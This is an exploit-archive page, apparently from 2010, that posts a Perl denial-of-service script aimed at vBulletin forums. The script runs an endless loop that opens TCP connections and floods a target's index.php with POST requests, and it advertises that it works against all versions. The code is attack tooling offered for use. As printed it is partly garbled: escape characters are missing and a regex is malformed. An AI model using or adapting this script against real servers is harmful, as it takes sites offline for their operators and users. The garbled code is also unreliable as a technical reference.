vBulletin DOS - all version

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : vBulletin DOS - all version
# Published : 2010-04-12
# Author : Jim Salim
# Previous Title : Joomla Component com_flexicontent Local File Vulnerability
# Next Title : Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability

# DOS Vbulletin 92% Works ;)
#
# Tested on all versions! and can DOS the server
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1rn".
"Accept: */*rn".
"Accept-Language: en-gbrn".
"Content-Type: application/x-www-form-urlencodedrn".
"Accept-Encoding: gzip, deflatern".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)rn".
"Host: $hostrn".
"Content-Length: $lenrn".
"Connection: Keep-Alivern".
"Cache-Control: no-cachernrn".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "nn";
system('ping $host');
sub usage {
print "tusage: n";
print "t$0 <host> </dir/>n";
print "tex: $0 127.0.0.1 /forum/n";
print "tex2: $0 127.0.0.1 /nn";
exit();
};